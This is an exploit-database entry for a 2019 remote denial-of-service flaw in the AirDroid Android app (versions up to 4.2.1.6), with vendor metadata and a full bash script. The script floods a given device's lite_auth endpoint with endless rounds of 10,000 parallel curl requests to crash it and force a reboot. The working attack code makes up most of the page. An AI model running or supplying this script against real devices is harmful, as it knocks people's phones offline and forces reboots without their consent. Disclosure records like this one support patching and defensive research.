header-logo
Suggest Exploit
vendor:
AirDroid
by:
Marcelo Vázquez (aka s4vitar)
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: AirDroid
Affected Version From: <= AirDroid 4.2.1.6
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:sand_studio:airdroid
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Android
2019

AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot

This exploit allows an attacker to send a large number of requests to the AirDroid server, resulting in a denial of service (DoS) and system crash, followed by a forced reboot.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!/bin/bash

# *********************************************************************
# *             Author: Marcelo Vázquez (aka s4vitar)                 *
# *  AirDroid Denial of Service (DoS) & System Crash + Forced Reboot  *
# *********************************************************************

# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
# Date: 2019-02-13
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: <= AirDroid 4.2.1.6
# Tested on: Android

url=$1 # Example: http://192.168.1.46:8888
requests=0

trap ctrl_c INT

# If Ctrl+C key is pressed then the threads are killed
function ctrl_c() {
        echo -e "\n\n[*]Exiting...\n" && tput cnorm
        pkill curl > /dev/null 2>&1
        exit
}

# Detect number of arguments being passed to the program
if [ "$(echo $#)" == "1" ]; then
	# Infinite Loop
	tput cnorm && while true; do
		# We send 10000 requests in thread
		for i in $(seq 1 10000); do
			curl --silent "$url/sdctl/comm/lite_auth/" &
			let requests+=1
		done && wait # Here we wait for the threads to finish
	echo "Requests Sent: $requests"
	done
else
	echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi